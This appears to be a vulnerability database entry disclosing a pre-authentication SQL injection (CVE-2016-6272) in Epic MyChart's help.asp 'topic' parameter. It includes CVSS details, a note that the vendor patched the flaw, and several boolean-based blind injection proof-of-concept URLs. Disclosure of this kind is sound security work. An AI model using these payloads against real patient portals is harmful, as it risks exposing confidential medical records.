EPIC MyChart SQL Injection

2018.02.17
Credit: Shayan S
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Epic Systems Corporation MyChart SQL Injection # Google Dork: MyChartA(r) licensed from Epic Systems Corporation # Date: 8/19/16 # Exploit Author: Shayan Sadigh (http://threat.tevora.com/author/shayan/) # Vendor Homepage: https://www.epic.com/software # Software Link: N/A # Version: N/A # Tested on: Windows/Unix # CVE : CVE-2016-6272 Epic Systems Corporation MyChart "is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction." The MyChart software uses Intersystems CachA(c) for its DBMS and contains a pre-authenticated SQL injection due to the lack of sanatization for the GE parameter "topic". EPIC was quick to respond to contact and patch the vulnerability in MyChart. Below are two proof of concepts: Proof of concept 1: https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=7900 AND ("LygB"="LygB ===> TRUE (this will show the help topic for enabling cookies) https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=8000 AND ("LygB"="LygB ===> FALSE (will not show) Proof of concept 2 (operations): https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*8 OR "000OxPf"="000OxPf ===> TRUE https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 OR "000OxPf"="000OxPf ===> TRUE (because of the OR) https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 AND"000OxPf"="000OxPf ===> FALSE


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top